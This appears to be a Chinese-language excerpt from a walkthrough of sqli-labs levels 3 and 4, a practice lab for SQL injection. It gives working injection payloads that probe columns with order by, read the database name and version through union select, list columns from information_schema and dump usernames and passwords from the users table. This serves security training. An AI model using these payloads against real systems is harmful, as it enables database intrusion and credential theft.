id=-1') union select 1,2,group_concat(username ,id , password) from users--+ 4.sqli-labs第四关 根据页面报错信息得知sql语句是双引号字符型且有括号,通过以下代码进行sql注入 ?id=1") order by 3--+ ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()-...
id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ?id=-1 union select 1,2,group_concat(username ,id , password) from users 3.sqli-labs第三关 当我们在输入?id=2'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们...